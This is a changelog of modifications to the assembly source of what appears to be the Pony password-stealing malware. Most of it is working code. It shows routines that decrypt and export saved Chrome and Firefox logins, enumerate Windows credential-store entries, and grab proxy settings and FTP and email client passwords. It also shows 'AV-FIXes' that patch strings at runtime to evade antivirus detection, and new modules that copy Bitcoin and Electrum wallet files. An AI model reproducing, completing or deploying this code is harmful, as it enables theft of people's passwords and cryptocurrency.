PasswordModules.asm modifications

Line 11 (remove of an useless .code, and definitions added):
ITEMHDR_ID               equ 0beef0000h

Line 109 (code addition):
MODULE_BITCOIN            equ 00000061h
MODULE_ELECTRUM            equ 00000062h
MODULE_MULTIBIT            equ 00000063h
MODULE_FTPDISK            equ   00000064h
MODULE_LITECOIN            equ   00000065h
MODULE_NAMECOIN            equ   00000066h
MODULE_TERRACOIN         equ 00000067h
MODULE_BITCOINARMORY      equ 00000068h
MODULE_PPCOIN            equ 00000069h
MODULE_PRIMECOIN         equ 0000006ah
MODULE_FEATHERCOIN         equ 0000006bh
MODULE_NOVACOIN            equ 0000006ch
MODULE_FREICOIN            equ 0000006dh
MODULE_DEVCOIN            equ 0000006eh
MODULE_FRANKOCOIN         equ 0000006fh
MODULE_PROTOSHARES         equ 00000070h
MODULE_MEGACOIN            equ 00000071h
MODULE_QUARKCOIN         equ 00000072h
MODULE_WORLDCOIN         equ 00000073h
MODULE_INFINITECOIN         equ 00000074h
MODULE_IXCOIN            equ 00000075h
MODULE_ANONCOIN            equ 00000076h
MODULE_BBQCOIN            equ 00000077h
MODULE_DIGITALCOIN         equ 00000078h
MODULE_MINCOIN            equ 00000079h
MODULE_GOLDCOIN            equ 0000007ah
MODULE_YACOIN            equ 0000007bh
MODULE_ZETACOIN            equ 0000007ch
MODULE_FASTCOIN            equ 0000007dh
MODULE_I0COIN            equ 0000007eh
MODULE_TAGCOIN            equ 0000007fh
MODULE_BYTECOIN            equ 00000080h
MODULE_FLORINCOIN         equ 00000081h
MODULE_PHOENIXCOIN         equ 00000082h
MODULE_LUCKYCOIN         equ 00000083h
MODULE_CRAFTCOIN         equ 00000084h
MODULE_JUNKCOIN            equ 00000085h


; collect proxy settings stored in browsers (HTTP/HTTPS password grabbing must be enabled in builder!)
COLLECT_PROXY_SETTINGS      equ 1

Line 198 (just a procedure rename):
invoke   IsDataAlreadyProcessed, map.lpMem, map.dwFileSize

Line 235 (just to match the procedure rename):
IsFileAlreadyProcessed proc uses ebx path
Line 248 (just to match the procedure rename):
invoke   IsDataAlreadyProcessed, map.lpMem, map.dwFileSize
Line 261 (just to match the procedure rename):
IsFileAlreadyProcessed endp

Line 442:
; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Windows (WinInet) Proxy Settings (used for IE and Chrome based browsers)
; SFTP: not supported

.data
   CProxySettingsRegPath               db   'Software\Microsoft\Windows\CurrentVersion\Internet Settings',0
   CProxySettingsRegValue               db   'ProxyServer',0

.code

IFDEF COLLECT_PROXY_SETTINGS

GrabProxySettings proc stream, item_id
   LOCAL   len: DWORD
   LOCAL   mem: DWORD

   mov   len, 0
   invoke   RegReadValueStr, dwCurrentUserKey, offset CProxySettingsRegPath, offset CProxySettingsRegValue, addr len
   .IF   eax
      mov   mem, eax
      invoke   CommonAppendDataStr, stream, mem, item_id
      invoke   MemFree, mem
   .ENDIF

   ret
GrabProxySettings endp

ENDIF

Line 476 (code clean-up):
the .data containing this vanished:
   szHWIDValue      db   "HWID",0
   szGUIDFmt      db   "{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}",0

   win64_getnative      db   "GetNativeSystemInfo",0
   win64_kernel      db   "kernel32.dll",0
   win64_process      db   "IsWow64Process",0

IsWin64 procedure vanished from the code but is called line 518
IsAdmin procedure vanished from the code but is called line 533
InstallHWIDValue procedure vanished from the code but is called line 537

Line 591 (2 comments added):
; Tested: Far Manager v3.0 build 3367 x86
; Tested: Far Manager v3.0 build 3525 x86

Line 747 (comment added for the Windows/Total Commander proc):
; Tested: 8.01 64 bit (Release)

Line 837 (code added, Windows/Total Commander proc):
   mov byte ptr[CWTCIni], 'w'
   mov   byte ptr[CWTCRegPath1+9], 'G'
   mov   byte ptr[CWTCRegPath2+9], 'G'

Line 927 (comment added):
; Tested: WS_FTP Pro 12.4

Line 1123 (added definition for CuteFTP 9):
CCuteFTP_RegPath7   db   "Software\GlobalSCAPE\CuteFTP 9\QCToolbar",0
Line 1286 (added definition for CuteFTP 9):
invoke   CuteFTPProcessQuickConnections, stream, offset CCuteFTP_RegPath7

Line 1306 (no idea if it's bugfix or error in my 1.9 package)
anyway this concern just a letter fix for path name in FlashFXP dirs not really a major change (if this is one)

Line 1378 (code/comment addition):
   ; AV-FIXes
   mov   byte ptr[CFlashFXP_RegPath1], 'S'
   mov   byte ptr[CFlashFXP_RegPath2], 'S'
   mov   byte ptr[CFlashFXP_RegPath3], 'S'
   mov   byte ptr[CFlashFXP_HistoryName+1], 'H'

Line 1812 (code addition):
   mov   byte ptr[CSmartFTPHistMask], 'H'

Line 1868 (code addition):
   mov   byte ptr[CTurboFTPDatMask], 'a'

Line 3747 (comment addition):
; Tested: 16.0.1196.73 (Chrome based)

Line 3767 (code addition):
   COperaNewAppDataDir   db   '\Opera Software',0

Line 4219 (procedure rename, refere to line 198):
invoke   IsFileAlreadyProcessed, lpFileName

Line 4408 (code addition):
ChromeCommonScanCustomID proto :DWORD, :DWORD, :DWORD

Line 4447 (code addition):
invoke   ChromeCommonScanCustomID, stream, offset COperaNewAppDataDir, ITEMHDR_ID or 2

Line 4599 (comment edit):
; FTP Voyager 11.x-16.x
Line 4601: (comment edit):
; Tested: Version 16.1.0.0
Line 4610: (code addition):
   CFTPVoyagerProfileFile2   db   'FTPVoyager.ftp.backup',0
   CFTPVoyagerProfileFile3   db   'FTPVoyager.ftp.old.backup',0

Line 4623 (code addition):
      push   eax
      push   eax
      invoke   CommonFileScan, stream, eax, offset CFTPVoyagerProfileFile1, ITEMHDR_ID or 0
      pop   eax
      invoke   CommonFileScan, stream, eax, offset CFTPVoyagerProfileFile2, ITEMHDR_ID or 0
      pop   eax
      invoke   CommonFileScan, stream, eax, offset CFTPVoyagerProfileFile3, ITEMHDR_ID or 0

Line 4703 (code delete):
szSQLite3Imports vanished

Line 4726 (code delete):
szSQLiteMozillaQuery vanished

Line 4737: (code added):
   IFDEF   COLLECT_PROXY_SETTINGS
   szMozillaProxy      db   'moz-proxy://',0
   ENDIF

Line 4896 (code deletion/addition):
MozillaReadSQLColData whole procedure replaced by: ProcessMozillaSQLiteFile proto :DWORD, :DWORD, :DWORD

Line 4898 (code deletion):
Removed into the MozillaReadSQLFile proc the DWORD definitions

line 4904 (procedure rename, refere to line 198):
invoke   IsFileAlreadyProcessed, szSQLFile

Line 4915 (comment added/code deleted)
; Process SQLite3 database using tiny db engine
LoadDllImports vanished replaced by:    invoke   ProcessMozillaSQLiteFile, stream, szSQLFile, ITEMHDR_ID or 0

Line 4917 (additional code remove about the sqlite3 db)

Line 4967 (procedure rename, refere to line 198):
   invoke   IsFileAlreadyProcessed, szSignonsFile

Line 5071 (code addition):
   IFDEF   COLLECT_PROXY_SETTINGS
   .IF   eax
      invoke   lstrlen, offset szMozillaProxy
      invoke   StrCmpNI, host_line, offset szMozillaProxy, eax
   .ENDIF

Line 5212 (code addition):
   IFDEF COLLECT_PROXY_SETTINGS
      invoke   StrStrI, ininame, offset szMozillaPrefsJS
      .IF   eax
         invoke   PonyStrCat, dir, offset szSlash
         invoke   PonyStrCatFreeArg1, eax, ininame
         push   eax
         invoke   CommonAppendFile, stream, eax, ITEMHDR_ID or 1
         call   MemFree
      .ENDIF
   ENDIF

Line 61008 (procedure added):
PSExportAUser proc dwType, lpName, lpUser, pData, pDataLen, stream
   invoke   StreamWriteDWORD, stream, dwType

   invoke   lstrlenA, lpName
   inc   eax ; NULL

   invoke   StreamWriteBinaryString, stream, lpName, eax
   invoke   StreamWriteBinaryString, stream, pData, pDataLen

   invoke   lstrlenA, lpUser
   inc   eax ; NULL

   invoke   StreamWriteBinaryString, stream, lpUser, eax
   ret
PSExportAUser endp

Line 6418 (code addition):
szIE7CredAll   db   '*',0
Line 6420 (code addition):
szIE7Comment   db   'SspiPfc',0

Line 6498 (code addition):
   IFDEF COLLECT_PROXY_SETTINGS
      .IF   MyCredFree && MyCredEnumerate && MyCryptUnprotectData
         mov   pCred, NULL
         mov   Count, 0
         lea   eax, pCred
         push   eax
         lea   eax, Count
         push   eax
         push   0
         push   offset szIE7CredAll
         call   MyCredEnumerate
         .IF   eax && Count && pCred
            mov   esi, pCred
            .WHILE   Count && dword ptr[esi]
               push   esi
               mov   esi, dword ptr[esi]

               invoke   lstrcmpi, dword ptr[esi].CREDENTIAL._Comment, offset szIE7Comment
               .IF   !eax
                  m2m   InBlob.cbData, dword ptr[esi].CREDENTIAL.CredentialBlobSize
                  m2m   InBlob.pbData, dword ptr[esi].CREDENTIAL.CredentialBlob

                  .IF   InBlob.cbData
                     invoke   PSExportAUser, ITEMHDR_ID or 6, [esi].CREDENTIAL.TargetName, [esi].CREDENTIAL.UserName, InBlob.pbData, InBlob.cbData, stream
                     invoke   LocalFree, OutBlob.pbData
                  .ENDIF
               .ENDIF

               pop   esi
               dec   Count
               add   esi, 4
            .ENDW
            push   pCred
            call   MyCredFree
         .ENDIF
      .ENDIF
   ENDIF

Line 6547 (code addition):
   IFDEF COLLECT_PROXY_SETTINGS
      invoke   GrabProxySettings, stream, ITEMHDR_ID or 5
   ENDIF

Line 6929 (code addition):
ELSEIFDEF COMPILE_MODULE_OPERA
   COMPILE_CHROMIUM_CODE   equ   1
Line 6934 code addition):
   COMPILE_SQLITE3_CODE   equ   1
ELSEIFDEF COMPILE_MOZILLA_CODE
   COMPILE_SQLITE3_CODE   equ   1
ENDIF

IFDEF COMPILE_SQLITE3_CODE

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Line 6945 (code addition):
   CChromeWebData      db   'Web Data',0
   CChromeLoginData   db   'Login Data',0

Line 6953 (code deletion):
deleted some datas related to chrome (szChromeLoginTable, szChromeActionURL, szChromePassValue, [...] szChromeHTTPS

Line 6956 (code deletion):
dwChromeActionURL, dwChromePassValue, dwChromeUserValue

Line 7163 (line replace):
mov   eax, TRUE -> invoke   SQLiteBuildDataRecord, NULL, 0, SQLITE_DATATYPE_OTHER, lpDataOut

Line 7229 (comment edition):
; Get data length & pointer for a single cell from 1-dim record array

Line 7378 (code edition):
added 'item_id' into the SQLiteReadPage proc
Line 7488 (code edition):
Same edition as line 7378.

Line 7578 (code addition):
push   item_id

Line 7596 (code deletion):
Process SQL column definitions

Line 7598 (code edition):
added callback_func to SQLiteProcessSQL procedure

Line 7608 (instruction added):
cld

Line 7665 (comment edition):
; Replace double space chars to single space chars ('  ' -> ' ')

Line 7681 (comment edition):
; Process column definitions one by one

Line 7688 (code edition):
replaced invoke SQLiteProcessCol by:
         push   nCol
         push   esi
         call   callback_func

Line 7700 (code edition):
same edition as line 7688.

Line 7707 (code addition):
ProcessSQLiteStream proc stream, target_stream, item_id, callback_func
   LOCAL   header[16]: BYTE
   LOCAL   dwStatusCode: DWORD

   ; Read database header

   invoke   StreamGotoBegin, stream
   invoke   StreamRead, stream, addr header, sizeof header
   .iF   !eax
      ret
   .ENDIF

   invoke   CompareMem, addr header, offset szSQLite3Header, sizeof header
   .IF   !eax
      ret
   .ENDIF

   mov   dwStatusCode, TRUE
   invoke   Stream_SafeReadWORD, stream, addr dwStatusCode
   .IF   !eax || !dwStatusCode
      sub   eax, eax
      ret
   .ENDIF

   ; Validate page size
   push   eax
   sub   ecx, ecx
   .WHILE   eax
      shr   eax, 1
      .IF   CARRY?
         inc   ecx
      .ENDIF
   .ENDW
   pop   eax

   .IF   eax == 1
      mov   eax, 65536
   .ENDIF

   ; Page size must be power of 2
   .IF   ecx != 1
      sub   eax, eax
      ret
   .ENDIF
   mov   dwSQLitePageSize, eax

   ; File format write version
   invoke   Stream_SafeReadByte, stream, addr dwStatusCode
   .IF   ((eax != 1) && (eax != 2)) || ! dwStatusCode
      sub   eax, eax
      ret
   .ENDIF

   ; File format read version
   invoke   Stream_SafeReadByte, stream, addr dwStatusCode
   .IF   ((eax != 1) && (eax != 2)) || ! dwStatusCode
      sub   eax, eax
      ret
   .ENDIF

   ; Reserved bytes
   invoke   Stream_SafeReadByte, stream, addr dwStatusCode
   .IF   eax != 0 || ! dwStatusCode
      sub   eax, eax
      ret
   .ENDIF

   ; Maximum embedded payload fraction
   invoke   Stream_SafeReadByte, stream, addr dwStatusCode
   .IF   eax != 64 || ! dwStatusCode
      sub   eax, eax
      ret
   .ENDIF

   ; Minimum embedded payload fraction
   invoke   Stream_SafeReadByte, stream, addr dwStatusCode
   .IF   eax != 32 || ! dwStatusCode
      sub   eax, eax
      ret
   .ENDIF

   ; Leaf payload fraction
   invoke   Stream_SafeReadByte, stream, addr dwStatusCode
   .IF   eax != 32 || ! dwStatusCode
      sub   eax, eax
      ret
   .ENDIF
   invoke   Stream_SafeReadSkip, stream, 4*8, addr dwStatusCode

   ; Database text encoding
   invoke   Stream_SafeReadDWORD, stream, addr dwStatusCode
   .IF   (eax < 1) || (eax > 3) || (!dwStatusCode)
      sub   eax, eax
      ret
   .ENDIF

   mov   dwSQLiteEncoding, eax

   invoke   Stream_SafeReadSkip, stream, 40, addr dwStatusCode

   ; Start database processing from page 1
   invoke   SQLiteReadPage, stream, target_stream, 1, addr dwStatusCode, item_id, callback_func

   ret
ProcessSQLiteStream endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Common chromium decryption

IFDEF COMPILE_CHROMIUM_CODE

.data
   CChromeWebData      db   'Web Data',0
   CChromeLoginData   db   'Login Data',0
   szChromeLoginTable    db   'logins',0
   szChromeActionURL   db   'origin_url',0
   szChromePassValue   db   'password_value',0
   szChromeUserValue   db   'username_value',0
   szChromeFTP         db   'ftp://',0
   IFDEF   GRAB_HTTP
   szChromeHTTP      db   'http://',0
   szChromeHTTPS      db   'https://',0
   ENDIF

.data?
   dwChromeActionURLIndex   dd   ?
   dwChromePassValueIndex   dd   ?
   dwChromeUserValueIndex   dd   ?
.code

; Process SQL column definition
SQLiteProcessChromeColDef proc uses edi column_definition, column_index
   invoke   Trim, column_definition
   invoke   StrStrI, column_definition, offset szSQLiteSpaceChar
   .IF   !eax
      ret
   .ENDIF
   mov   byte ptr[eax], 0
   invoke   Trim, column_definition

   mov   edi, offset szSQLiteStopWords
@@:
   invoke   lstrcmpi, edi, column_definition
   .IF   !eax
      ret
   .ENDIF
   @Next   @B

   invoke   lstrlen, column_definition
   .IF   !eax
      ret
   .ENDIF

   invoke   lstrcmpi, column_definition, offset szChromeActionURL
   .IF   !eax
      m2m   dwChromeActionURLIndex, column_index
   .ENDIF

   invoke   lstrcmpi, column_definition, offset szChromePassValue
   .IF   !eax
      m2m   dwChromePassValueIndex, column_index
   .ENDIF

   invoke   lstrcmpi, column_definition, offset szChromeUserValue
   .IF   !eax
      m2m   dwChromeUserValueIndex, column_index
   .ENDIF

   mov   eax, TRUE
   ret
SQLiteProcessChromeColDef endp
; Process chrome password data row
SQLiteProcessChromeDataTable proc uses esi edi stream, target_stream, row_array, cell_count, item_id

Line: 7904 (line edition):
dwChromeActionURL -> dwChromeActionURLIndex
dwChromePassValue -> dwChromePassValueIndex
dwChromeUserValue -> dwChromeUserValueIndex

Line 7906 (line edition):
dwChromeActionURL -> dwChromeActionURLIndex
Line 7907 (line edition):
dwChromePassValue -> dwChromePassValueIndex
Line 7908 (line edition):
dwChromeUserValue -> dwChromeUserValueIndex

Line 7960 (line edition):
ITEMHDR_ID or 0 -> item_id

Line 7974 (line edition):
SQLiteProcessDataTable endp -> SQLiteProcessChromeDataTable endp

Line 7985 (line edition):
SQLiteProcessSchemaTable -> SQLiteProcessChromeSchemaTable

Line 8011 code edition):
mov   dwChromeActionURL, -1 -> mov dwChromeActionURLIndex, -1
Line 8012 code edition):
mov   dwChromePassValue, -1 -> mov dwChromePassValueIndex, -1
Line 8013 code edition):
mov   dwChromeUserValue, -1 -> mov dwChromeUserValueIndex, -1

Line 8015 (line edition):
invoke   SQLiteProcessSQL, cell_data, offset SQLiteProcessChromeColDef

Line 8018 (code edition):
.IF   (dwChromeActionURLIndex != -1) && (dwChromePassValueIndex != -1) && (dwChromeUserValueIndex != -1)
Line 8019 (code edition):
invoke   SQLiteReadPage, stream, target_stream, root_page, addr dwStatusCode, item_id, offset SQLiteProcessChromeDataTable

Line 8029 (procedure rename):
SQLiteProcessChromeSchemaTable endp

Line 8031 (procedure modification):
ProcessChromeSQLiteFile proc target_stream, szSQLFileName, item_id
   LOCAL   stream: DWORD

   invoke   StreamCreate, addr stream
   invoke   StreamLoadFromFile, szSQLFileName, stream
   .IF   eax
      invoke   ProcessSQLiteStream, stream, target_stream, item_id, offset SQLiteProcessChromeSchemaTable
      .IF   !eax
         ; Error occured while processing ".sqlite" file
         ; Send ".sqlite" file for debugging
         ;invoke   CommonAppendFileForceDupe, target_stream, lpFileName, ITEMHDR_ID or 1000h
      .ENDIF

Line 8029 (just a renamed of the end of the proc.):
SQLiteProcessChromeSchemaTable endp

Line 8031 (rewrote of the proc):
ProcessChromeSQLiteFile proc target_stream, szSQLFileName, item_id
   LOCAL   stream: DWORD

   invoke   StreamCreate, addr stream
   invoke   StreamLoadFromFile, szSQLFileName, stream
   .IF   eax
      invoke   ProcessSQLiteStream, stream, target_stream, item_id, offset SQLiteProcessChromeSchemaTable
      .IF   !eax
         ; Error occured while processing ".sqlite" file
         ; Send ".sqlite" file for debugging
         ;invoke   CommonAppendFileForceDupe, target_stream, lpFileName, ITEMHDR_ID or 1000h
      .ENDIF

Line 8044 (code addition):
invoke   StreamFree, stream

Line 8046 (proc code addition):
   ret
ProcessChromeSQLiteFile endp

ChromeAppDataCommonSingleFileScan proc stream, csidl, appdata_dir, config_file, item_id
   invoke   SHGetFolderPathStr, csidl
   .IF   eax
      invoke   PonyStrCatFreeArg1, eax, appdata_dir
      push   eax
      invoke   CommonFileScanCallback, stream, eax, config_file, item_id, offset ProcessChromeSQLiteFile
      call   MemFree

Line 8057 (code addition):
   ret
ChromeAppDataCommonSingleFileScan endp

Line 8060 (proc code addition):
ChromeCommonScanCustomID proc stream, base_appdata_dir, id
   invoke   ChromeAppDataCommonSingleFileScan, stream, CSIDL_APPDATA, base_appdata_dir, offset CChromeWebData, id
   invoke   ChromeAppDataCommonSingleFileScan, stream, CSIDL_APPDATA, base_appdata_dir, offset CChromeLoginData, id
   invoke   ChromeAppDataCommonSingleFileScan, stream, CSIDL_LOCAL_APPDATA, base_appdata_dir, offset CChromeWebData, id
   invoke   ChromeAppDataCommonSingleFileScan, stream, CSIDL_LOCAL_APPDATA, base_appdata_dir, offset CChromeLoginData, id
   invoke   ChromeAppDataCommonSingleFileScan, stream, CSIDL_COMMON_APPDATA, base_appdata_dir, offset CChromeWebData, id
   invoke   ChromeAppDataCommonSingleFileScan, stream, CSIDL_COMMON_APPDATA, base_appdata_dir, offset CChromeLoginData, id
   ret
ChromeCommonScanCustomID endp

ChromeCommonScan proc stream, base_appdata_dir
   invoke   ChromeCommonScanCustomID, stream, base_appdata_dir, ITEMHDR_ID or 0
   ret
ChromeCommonScan endp

ENDIF

IFDEF COMPILE_MOZILLA_CODE

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Common Mozilla SQLite3 database decryption

.data
   szMozillaLoginTable db   'moz_logins',0
   szMozillaActionURL   db   'hostname',0
   szMozillaPassValue   db   'encryptedPassword',0
   szMozillaUserValue   db   'encryptedUsername',0

.data?
   dwMozillaActionURLIndex   dd   ?
   dwMozillaPassValueIndex   dd   ?
   dwMozillaUserValueIndex   dd   ?

.code

; Process SQL column definition
SQLiteProcessMozillaColDef proc uses edi column_definition, column_index
   invoke   Trim, column_definition
   invoke   StrStrI, column_definition, offset szSQLiteSpaceChar
   .IF   !eax

Line 8102 (code addition):
   mov   byte ptr[eax], 0
   invoke   Trim, column_definition

Line 8105 (code addition/deletion):
   mov   edi, offset szSQLiteStopWords
@@:
   invoke   lstrcmpi, edi, column_definition
   .IF   !eax

line 8113 (code addition/deletion):
invoke   lstrlen, column_definition
   .IF   !eax

Line 8118 (code addition/remove):
   invoke   lstrcmpi, column_definition, offset szMozillaActionURL
   .IF   !eax
      m2m   dwMozillaActionURLIndex, column_index

Line 8123 (code addition/remove):
   invoke   lstrcmpi, column_definition, offset szMozillaPassValue
   .IF   !eax
      m2m   dwMozillaPassValueIndex, column_index

Line 8128 (code addition/deletion):
   invoke   lstrcmpi, column_definition, offset szMozillaUserValue
   .IF   !eax
      m2m   dwMozillaUserValueIndex, column_index

Line 8133 (code addition/deletion):
   mov   eax, TRUE
   ret
SQLiteProcessMozillaColDef endp

; Process password data row
SQLiteProcessMozillaDataTable proc stream, target_stream, row_array, cell_count, item_id
   LOCAL   url_cell_len: DWORD
   LOCAL   url_cell_type: DWORD
   LOCAL   url_cell_data: DWORD
   LOCAL   user_cell_len: DWORD
   LOCAL   user_cell_type: DWORD
   LOCAL   user_cell_data: DWORD
   LOCAL   pass_cell_len: DWORD
   LOCAL   pass_cell_type: DWORD
   LOCAL   pass_cell_data: DWORD
   LOCAL   host: DWORD
   LOCAL   user: DWORD
   LOCAL   pass: DWORD

   .IF   !cell_count

Line 8155 (code addition/deletion):
   mov   eax, cell_count
   .IF   (dwMozillaActionURLIndex < eax) && (dwMozillaPassValueIndex < eax) && (dwMozillaUserValueIndex < eax)
      ; Get cell values
      invoke   SQLiteGetRecordArrayCell, row_array, dwMozillaActionURLIndex, addr url_cell_len, addr url_cell_type, addr url_cell_data
      invoke   SQLiteGetRecordArrayCell, row_array, dwMozillaUserValueIndex, addr user_cell_len, addr user_cell_type, addr user_cell_data
      invoke   SQLiteGetRecordArrayCell, row_array, dwMozillaPassValueIndex, addr pass_cell_len, addr pass_cell_type, addr pass_cell_data

      .IF   url_cell_len && pass_cell_len
         mov   edx, url_cell_len
         inc   edx
         invoke   MemAlloc, edx
         mov   host, eax
         invoke   MoveMem, url_cell_data, host, url_cell_len

         mov   user, NULL
         mov   pass, NULL

         .IF   mozilla_mode == MOZILLA_MODE_FTP_HTTP
            invoke   lstrlen, offset szMozillaFTP
            invoke   StrCmpNI, host, offset szMozillaFTP, eax
            IFDEF   GRAB_HTTP
            .IF   eax
               invoke   lstrlen, offset szMozillaHTTP
               invoke   StrCmpNI, host, offset szMozillaHTTP, eax
            .ENDIF
            .IF   eax
               invoke   lstrlen, offset szMozillaHTTPS
               invoke   StrCmpNI, host, offset szMozillaHTTPS, eax
            .ENDIF
            IFDEF   COLLECT_PROXY_SETTINGS
            .IF   eax
               invoke   lstrlen, offset szMozillaProxy
               invoke   StrCmpNI, host, offset szMozillaProxy, eax
            .ENDIF
            ENDIF
            ENDIF
         .ELSEIF mozilla_mode == MOZILLA_MODE_FIREFTP
            invoke   lstrlen, offset szMozillaFireFTP
            invoke   StrCmpNI, host, offset szMozillaFireFTP, eax
         .ELSEIF mozilla_mode == MOZILLA_MODE_EMAIL
            sub   eax, eax ; allow all hosts
         .ENDIF

         .IF   !eax
            ; user (can be empty for some record types)
            .IF   user_cell_len
               invoke   MozillaNSSDecryptPassword, user_cell_data, user_cell_len
               mov   user, eax
            .ENDIF

            ; pass
            invoke   MozillaNSSDecryptPassword, pass_cell_data, pass_cell_len
            mov   pass, eax

            .IF   host && pass
               ; export recovered data
               invoke   StreamWriteDWORD, target_stream, item_id
               invoke   StreamWriteString, target_stream, host
               invoke   StreamWriteString, target_stream, user
               invoke   StreamWriteString, target_stream, pass
            .ENDIF
         .ENDIF

         invoke   MemFree, user
         invoke   MemFree, pass
         invoke   MemFree, host
      .ENDIF

Line 8225 (code addition/deletion):
   ret
SQLiteProcessMozillaDataTable endp

SQLiteProcessMozillaSchemaTable proc stream, target_stream, row_array, cell_count, item_id
   LOCAL   cell_len: DWORD
   LOCAL   cell_type: DWORD
   LOCAL   cell_data: DWORD
   LOCAL   table_name: DWORD
   LOCAL   root_page: DWORD
   LOCAL   dwStatusCode: DWORD

   .IF   cell_count == 5
      ; Validate table column count
      invoke   SQLiteGetRecordArrayCell, row_array, 2, addr cell_len, addr cell_type, addr cell_data
      .IF   cell_type == SQLITE_DATATYPE_STR
         m2m   table_name, cell_data
         invoke   lstrcmpi, table_name, offset szMozillaLoginTable
         .IF   !eax
            invoke   SQLiteGetRecordArrayCell, row_array, 0, addr cell_len, addr cell_type, addr cell_data
            .IF   cell_type == SQLITE_DATATYPE_STR
               invoke   lstrcmp, offset szSQLite3TableType, cell_data
               .IF   !eax
                  invoke   SQLiteGetRecordArrayCell, row_array, 3, addr cell_len, addr cell_type, addr cell_data
                  .IF   cell_type == SQLITE_DATATYPE_INT
                     mov   eax, cell_data
                     m2m   root_page, dword ptr[eax]

                     invoke   SQLiteGetRecordArrayCell, row_array, 4, addr cell_len, addr cell_type, addr cell_data
                     .IF   cell_type == SQLITE_DATATYPE_STR
                        mov   dwMozillaActionURLIndex, -1
                        mov   dwMozillaPassValueIndex, -1
                        mov   dwMozillaUserValueIndex, -1

                        invoke   SQLiteProcessSQL, cell_data, offset SQLiteProcessMozillaColDef
                        mov   dwStatusCode, TRUE

                        .IF   (dwMozillaActionURLIndex != -1) && (dwMozillaPassValueIndex != -1) && (dwMozillaUserValueIndex != -1)
                           invoke   SQLiteReadPage, stream, target_stream, root_page, addr dwStatusCode, item_id, offset SQLiteProcessMozillaDataTable
                        .ENDIF
                     .ENDIF
                  .ENDIF
               .ENDIF
            .ENDIF
         .ENDIF
      .ENDIF

Line 8271 (code deletion):
mov   dwSQLiteEncoding, eax etc....

Line 8272 (code edition):
SQLiteProcessMozillaSchemaTable endp

Line 8272 (code edition):
ProcessMozillaSQLiteFile proc target_stream, szSQLFileName, item_id

Line 8280 (code addition):
, item_id, offset SQLiteProcessMozillaSchemaTable

Line 8290 (code edition/remove):
ProcessSQLiteFile endp -> ProcessMozillaSQLiteFile endp
ChromeAppDataCommonSingleFileScan procedure deleted.

Line 8299 (comment added):
; Tested: Google Chrome 29.0.1547.66 m

Line 8374 (code edition):
ProcessSQLiteFile -> ProcessChromeSQLiteFile
Line 8375 (code edition):
ProcessSQLiteFile -> ProcessChromeSQLiteFile

Line 9307 (procedure rename, check Line 198):
         invoke   IsDataAlreadyProcessed, map.lpMem, map.dwFileSize

Line 10932 (code addition):
   mov   byte ptr[CWindowsMailPasswordList+1], 'P'
   mov   byte ptr[CWindowsMailSMTPPass+1], 'S'

Line 11392 (code addition):
   mov   byte ptr[CIncrediMailSMTPServer], 'S'
   mov   byte ptr[CIncrediMailSMTPPort], 'S'
   mov   byte ptr[CIncrediMailSMTPUser], 'S'
   mov   byte ptr[CIncrediMailSMTPPass], 'S'

Line 11622 (code deletion):
base_path, do_decrypt <- (removed 'do_encrypt')

Line 11734 (code deletion):
reg_key, S, 0 <- (removed '0')

Line 11959 (code addition):
   .IF   bListEncrypted
      mov   bListEncrypted, FALSE
      invoke   DecipherList, offset COutlookRegValues
      invoke   DecipherList, offset COutlookBinaryValues
      invoke   DecipherList, offset COutlookPassValues
      invoke   DecipherList, offset COutlookPassValues2
   .ENDIF

Line 12087 (code addition):
; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Bitcoin
; http://bitcoin.org
; Tested: 0.8.1-beta
; SFTP: not supported

IFDEF COMPILE_MODULE_BITCOIN

.data
   CBitconWalletFile      db   'wallet.dat',0
   CBitcoinAppDataDir      db   '\Bitcoin',0

.code

GrabBitcoin proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_BITCOIN, 0
   mov   hdr_ofs, eax

   invoke   AppDataCommonFileScan, stream, offset CBitcoinAppDataDir, offset CBitconWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabBitcoin endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Electrum
; http://electrum.org/
; Tested: 1.7.3
; SFTP: not supported

IFDEF COMPILE_MODULE_ELECTRUM

.data
   CElectrumWalletFile      db   'electrum.dat',0
   CElectrumAppDataDir      db   '\Electrum',0

.code

GrabElectrum proc stream
   LOCAL   hdr_ofs: DWORD

   invoke   StreamWriteModuleHeader, stream, MODULE_ELECTRUM, 0
   mov   hdr_ofs, eax

   invoke   AppDataCommonFileScan, stream, offset CElectrumAppDataDir, offset CElectrumWalletFile, ITEMHDR_ID or 0

   invoke   StreamUpdateModuleLen, stream, hdr_ofs
   ret
GrabElectrum endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; MultiBit
; http://multibit.org
; Tested: 0.5.9
; SFTP: not supported

IFDEF COMPILE_MODULE_ELECTRUM

.data
   CMultiBitWalletFile      db   '.wallet',0
